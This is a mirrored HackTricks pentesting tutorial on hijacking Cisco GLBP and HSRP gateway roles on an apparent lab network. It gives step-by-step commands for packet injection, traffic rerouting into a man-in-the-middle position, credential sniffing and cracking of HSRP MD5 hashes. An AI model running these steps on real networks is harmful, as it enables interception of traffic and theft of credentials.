mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
281 lines
18 KiB
Markdown
281 lines
18 KiB
Markdown
# GLBP & HSRP Attacks
|
||
|
||
<details>
|
||
|
||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||
|
||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||
|
||
</details>
|
||
|
||
**This pages was copied from** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)****
|
||
|
||
## FHRP Hijacking <a href="#6196" id="6196"></a>
|
||
|
||
### What is FHRP? <a href="#b12d" id="b12d"></a>
|
||
|
||
FHRP (First Hop Redundancy Protocol) is a class of network protocols designed to create a hot redundant routing system. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps distribute the load.
|
||
|
||
**Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP, which I will demonstrate next.**
|
||
|
||
### GLBP Protocol <a href="#8a26" id="8a26"></a>
|
||
|
||
**Developed by Cisco Systems engineers.** Like HSRP, this protocol is implemented on top of TCP/IP protocol stack, that’s why UDP transport layer protocol under port number 3222 is used for translation of service information. GLBP routers within the same logical group exchange special “hello” packets every 3 seconds, but if within 10 seconds a GLBP router within the same group has not received a hello packet from its GLBP neighbor, it recognizes it as “dead”. However, the timer values can be configured depending on the administrator’s needs.
|
||
|
||
### The skeleton and mechanics of GLBP <a href="#3bb3" id="3bb3"></a>
|
||
|
||
GLBP provides load sharing to multiple routers (gateways) using one virtual IP address and multiple virtual MAC addresses. Each host is configured with the same virtual IP address and all routers in the virtual group participate in packet transmission.
|
||
|
||
Works much differently with the HSRP and VRRP protocols because it uses true load balancing mechanisms, I will denote below:
|
||
|
||
**Host-Dependent.** A type of load balancing used on a network where there is NAT. Host-Dependent guarantees the fact that the host will get back the same MAC address of the AVF device which was used at an earlier point in time, thus the NAT configured to the host will not be broken.
|
||
|
||
**Round-Robin.** In this mode, the AVG device distributes MAC addresses to AVF members alternately. This is the mechanism used by default.
|
||
|
||
**Weight-based round-robin**. Load balancing based on a special “Weight” metric
|
||
|
||
### Roles in the GLBP domain & Terminology <a href="#febd" id="febd"></a>
|
||
|
||
**AVG (Active Virtual Gateway)** — the router with the leading role is also responsible for distributing MAC addresses to other routers within the same GLBP group. A kind of “boss” in the GLBP domain. AVG tells the other routers how to distribute traffic by handing out MAC addresses when an ARP request arrives. It is worth noting that there can only be one AVG router in a GLBP domain, but it can also be an AVF member.
|
||
|
||
**AVF (Active Virtual Forwarder)** — a router in a GLBP group handling traffic in the network.
|
||
|
||
**GLBP Priority** — The priority value that determines which router in the GLBP group will be the AVG. The default value is 100 (the priority range can be from 1 to 255). It can be set manually, i.e. the network engineer himself determines which router will be the “superior” and which will be the “slave”. The higher the priority, the more likely the router will get the AVG role. Usually the AVG role is given to more powerful routers.
|
||
|
||
**GLBP Weight** — The value of the so-called GLBP Weight of a router in a GLBP group. GLBP Weight defines the load level of the router. This value is “floating” and can vary depending on the load on the physical channel (the Object Tracking mechanism is involved), but it can also be configured manually.
|
||
|
||
**GLBP Virtual IP Address** — the virtual IP address in the GLBP domain. Used as the default gateway address for legitimate hosts.
|
||
|
||
GLBP uses the reserved group mailing IP address **224.0.0.102** and the UDP transport layer protocol port number **3222** to send and process service information. Special GLBP Hello packets are sent every **3 seconds.** If the GLBP router has not received a hello packet from a neighbor within **10 seconds**, the neighbor will be considered “dead” and will drop out of the GLBP domain.
|
||
|
||
### GLBP Attack Mechanism <a href="#3260" id="3260"></a>
|
||
|
||
The technique of this network attack is to impose your device as the main router **by injecting a malicious GLBP packet with a maximum priority value.** **Successful exploitation leads to a DoS or MITM attack in which you can intercept traffic within the network, conduct a redirect, or cause a DoS as you take over the role of AVG router.** All you have to do is build a GLBP packet with the highest priority value of 255 and direct it towards the local network.
|
||
|
||
<figure><img src="../../.gitbook/assets/image (13).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
### GLBP Injection (Loki) <a href="#fb69" id="fb69"></a>
|
||
|
||
To demonstrate this attack, I will use [**Loki**](https://github.com/raizo62/loki\_on\_kali). It will perform a malicious GLBP injection with a maximum priority value of 255 and a maximum weight value of 255. But before performing the attack, the following information needs to be examined:
|
||
|
||
* **The virtual IP address used in the GLBP domain**
|
||
* **availability of authentication**
|
||
* **Value of router priorities**
|
||
|
||
We will be able to extract this information by analyzing GLBP traffic. We will use **Wireshark**.
|
||
|
||
As we see, only two routers are involved in the GLBP process: **10.10.100.100 and 10.10.100.200.**
|
||
|
||
<figure><img src="../../.gitbook/assets/image (158).png" alt=""><figcaption><p><strong>GLBP Ads</strong></p></figcaption></figure>
|
||
|
||
<figure><img src="../../.gitbook/assets/image (271).png" alt=""><figcaption><p>GLBP Advertisement from first router</p></figcaption></figure>
|
||
|
||
|
||
|
||
After analyzing GLBP traffic we have the following:
|
||
|
||
* **A misconfiguration was detected within the priority setting. AVG router is considered a GLBP router with priority 200, i.e. we have a vector for GLBP hijacking**
|
||
* **no authentication**
|
||
* **The virtual IP address used in the GLBP domain is 10.10.100.254**
|
||
|
||
With this information, **we can easily attack GLBP.**
|
||
|
||
<figure><img src="../../.gitbook/assets/image (174).png" alt=""><figcaption><p>Loki found GLBP ads from two routers</p></figcaption></figure>
|
||
|
||
Before the attack, **switch to promiscious mode and allow traffic routing:**
|
||
|
||
```
|
||
~$ sudo ip link set eth0 promisc on
|
||
~$ sudo sysctl -w net.ipv4.ip_forward=1
|
||
```
|
||
|
||
Select the router at IP address **10.10.100.100** and activate the **Get IP** option. You also need to generate a **Gratuitous ARP.**
|
||
|
||
<figure><img src="../../.gitbook/assets/image (222).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
<figure><img src="../../.gitbook/assets/image (161).png" alt=""><figcaption><p>The structure of a malicious GLBP injection</p></figcaption></figure>
|
||
|
||
As you can see, the AVG router is now pretending to be an attacking system. **The priority value is 255, the weight value is 255, i.e. the maximum.**
|
||
|
||
**After performing the injection we need to create a secondary IP address on our network interface with the value of the virtual IP address in the GLBP domain. You also need to set a 24-bit mask.**
|
||
|
||
**This way legitimate traffic will be looped back to us, because the virtual IP address used in the GLBP domain is the default gateway address for hosts:**
|
||
|
||
```
|
||
~$ sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
|
||
```
|
||
|
||
To see not only incoming traffic but also outgoing traffic, we need a small rule for **SNAT (masquerading):**
|
||
|
||
```
|
||
~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
|
||
```
|
||
|
||
**We also need to remove the default route on our machine and write a new one which will go through the former AVG router** **(address is 10.10.100.100).** Even though we have hijacked the AVG role from the router, it will still be able to route traffic.
|
||
|
||
```
|
||
~$ sudo route del default
|
||
~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
|
||
```
|
||
|
||
That’s it, **we are now the “man in the middle”!** I will run the tool [**net-creds.py**](https://github.com/DanMcInerney/net-creds) to analyze the traffic to look for important data. **For example, unencrypted FTP traffic or NTLM hashes.**
|
||
|
||
```
|
||
~$ sudo python2 net-creds.py -i eth0
|
||
```
|
||
|
||
After running the utility, I will try to read the SMB share with the IP address **172.16.100.70**, which is behind the GLBP routers.
|
||
|
||
```
|
||
user@Boundless:~$ smbclient -L \\172.16.100.70 --user mercy
|
||
```
|
||
|
||
<figure><img src="../../.gitbook/assets/image (243).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
**This is how you can intercept traffic within the network by attacking GLBP domains.**
|
||
|
||
### HSRP Hijacking <a href="#595f" id="595f"></a>
|
||
|
||
**HSRP (Hot Standby Router/Redundancy Protocol) —** is a Cisco proprietary protocol that allows for network gateway redundancy. The general idea is to combine several physical routers into one logical router with a common IP address. This address of the virtual router will be assigned to the interface of the router with the master role, and the latter, in its turn, will take care of traffic forwarding. In the HSRP domain, the task of handling all traffic falls precisely on the router with the primary role, unlike GLBP, where load balancing by using special metrics (priority and weight) was proposed.
|
||
|
||
### Roles in the HSRP domain & terminology <a href="#4185" id="4185"></a>
|
||
|
||
**HSRP Active Router** — a device that acts as a virtual router and provides forwarding of traffic from source networks to destination networks.\
|
||
**HSRP Standby Router** — a device that acts as a standby router, waiting for the active router to fail. When the primary Active router fails, the Standby router will take over the primary role and take over the duties of the Active router.\
|
||
**HSRP Group** — a group of devices that ensures the operation and fault tolerance of a logical router.\
|
||
**HSRP MAC Address** — the virtual MAC address of the logical router in the HSRP domain.\
|
||
**HSRP Virtual IP Address** — This is a special virtual IP address in the HSRP group. This IP address will be the default gateway for the end hosts, used on the logical router itself.
|
||
|
||
### HSRP protocol versions <a href="#eda3" id="eda3"></a>
|
||
|
||
The HSRP protocol has two versions — HSRPv1 and HSRPv2. They differ in the following parameters:
|
||
|
||
* **The number of possible logical groups.** HSRPv1 can have up to 255 groups. HSRPv2 can have up to 4096 groups
|
||
* **Multicast IP address.** HSRPv1 uses IP address **224.0.0.2** to send service information, and HSRPv2 uses **224.0.0.102**
|
||
* **Virtual MAC address.** HSRPv1 uses **00:00:0C:07:AC:XX** as its virtual MAC address. HSRPv2 has a virtual MAC address of **00:00:0C:9F:FX:XX** (where XX is the HSRP group number)
|
||
|
||
HSRP uses the reserved IP address **224.0.0.2** or **224.0.0.102** (depending on the HSRP version) and the UDP transport layer protocol with port number **1985** to broadcast and process the service information. Special HSRP Hello packets are sent **every 3 seconds.** If the HSRP router does not receive a hello packet from a neighbor **within 10 seconds**, the neighbor will be considered “dead” and will drop out of the HSRP domain.
|
||
|
||
### HSRP Attack Mechanism <a href="#d4a3" id="d4a3"></a>
|
||
|
||
**This is exactly the same as GLBP Hijacking. We need to perform a malicious HSRP injection with a maximum priority value of 255.** This allows us to hijack the role of the Active router, opening the door to a **MITM** attack. But again, we need to examine the following information before conducting the attack:
|
||
|
||
* **The virtual IP address used in the HSRP domain**
|
||
* **The presence of authentication**
|
||
* **Value of router priorities**
|
||
|
||
We can extract this information by analyzing HSRP traffic. **Let’s use Wireshark.**
|
||
|
||
As you can see in the screenshot, the HSRP process involves only two routers with addresses 10.10.100.100 and 10.10.100.200
|
||
|
||
<figure><img src="../../.gitbook/assets/image (181).png" alt=""><figcaption><p>HSRP Ads</p></figcaption></figure>
|
||
|
||
<figure><img src="../../.gitbook/assets/image (212).png" alt=""><figcaption><p>First HSRP router</p></figcaption></figure>
|
||
|
||
<figure><img src="../../.gitbook/assets/image (304).png" alt=""><figcaption><p>Second HSRP router</p></figcaption></figure>
|
||
|
||
Based on the analysis of HSRP traffic, we have the following:
|
||
|
||
* **A misconfiguration was detected within the priority setting. Active router is considered to be a HSRP router with priority 200, that is, we have a vector for HSRP hijacking**
|
||
* **the virtual IP address used in the HSRP domain is 10.10.100.254**
|
||
* **MD5 authentication is used**
|
||
|
||
Having authentication in the domain ties our hands, but I will fix that.
|
||
|
||
### HSRP Authentication Bypassing <a href="#d9fd" id="d9fd"></a>
|
||
|
||
Save HSRP traffic dump in **.pcap** format, so that the exfiltrator can correctly extract MD5 hashes from the dump. I will use **hsrp2john.py** as the exfiltrator:
|
||
|
||
```
|
||
~/cisconightmare/exfiltrate$ python2 hsrp2john.py hsrp_with_authentication.pcap
|
||
```
|
||
|
||
<figure><img src="../../.gitbook/assets/image (287).png" alt=""><figcaption><p>Extracted MD5 hashes from HSRP traffic dump</p></figcaption></figure>
|
||
|
||
I will crack the hashes with **John the Ripper,** specify the hashes themselves as input. And with the — **wordlist** switch I will specify the path to the dictionary:
|
||
|
||
```
|
||
~/cisconightmare/exfiltrate$ john hsrp_hashes --wordlist=wordlistforbrute
|
||
```
|
||
|
||
<figure><img src="../../.gitbook/assets/image (203).png" alt=""><figcaption><p>Cracked HSRP domain password</p></figcaption></figure>
|
||
|
||
As a result, we have a key to enter the HSRP domain — **endgame**.
|
||
|
||
### HSRP Injection (Loki) <a href="#6a2b" id="6a2b"></a>
|
||
|
||
I will use the same Loki to attack the HSRP protocol. Among other things, it has a key injection feature, which helps us bypass authentication. Earlier, in the HSRP Hijacking section, we obtained all the necessary information about the HSRP domain.
|
||
|
||
Starting Loki.
|
||
|
||
<figure><img src="../../.gitbook/assets/image (309).png" alt=""><figcaption><p>Loki detected HSRP ads</p></figcaption></figure>
|
||
|
||
Don’t forget to switch to promiscuous mode and allow traffic routing before conducting the attack:
|
||
|
||
```
|
||
~$ sudo ip link set eth0 promisc on
|
||
~$ sudo sysctl -w net.ipv4.ip_forward=1
|
||
```
|
||
|
||
Select the router with an address of **10.10.100.100** and a priority of **200**. As the **Secret** parameter, **enter the cracked password** from the HSRP domain, generate a Gratuitous ARP and select the **Get IP** option.
|
||
|
||
<figure><img src="../../.gitbook/assets/image (192).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
<figure><img src="../../.gitbook/assets/image (237).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
**As we can see, the Active router is now our attacking system. The priority value is 255.**
|
||
|
||
**After injection we need to create a secondary IP address on our network interface with the value of the virtual IP address in the HSRP domain. You should also specify 24-bit mask. In this way, legitimate traffic will be looped back to us, because the virtual IP address used in the HSRP domain is the default gateway address for hosts.**
|
||
|
||
```
|
||
~$ sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
|
||
```
|
||
|
||
**We set up the well-known Source NAT (masquerading) to intercept all traffic:**
|
||
|
||
```
|
||
~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
|
||
```
|
||
|
||
**We remove the default route on our machine and write a new one which will go through the former Active router (its address is 10.10.100.100). Even though we have hijacked the active role from the router, it will still be able to route traffic.**
|
||
|
||
```
|
||
~$ sudo route del default
|
||
~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
|
||
```
|
||
|
||
**Now we are the “man in the middle”. Let’s run** [**net-creds.py**](https://github.com/DanMcInerney/net-creds)**:**
|
||
|
||
```
|
||
~$ sudo python2 net-creds.py -i eth0
|
||
```
|
||
|
||
After running the utility, I will reproduce an attempt to authenticate to the FTP server at 172.16.100.140:
|
||
|
||
```
|
||
~$ ftp 172.16.100.140
|
||
```
|
||
|
||
<figure><img src="../../.gitbook/assets/image (179).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
As a result, we get creeds from the FTP server: **insomnia:betrayal**
|
||
|
||
This is how you can attack the HSRP domain and intercept traffic. Basically, everything is similar to GLBP.
|
||
|
||
<details>
|
||
|
||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||
|
||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||
|
||
</details>
|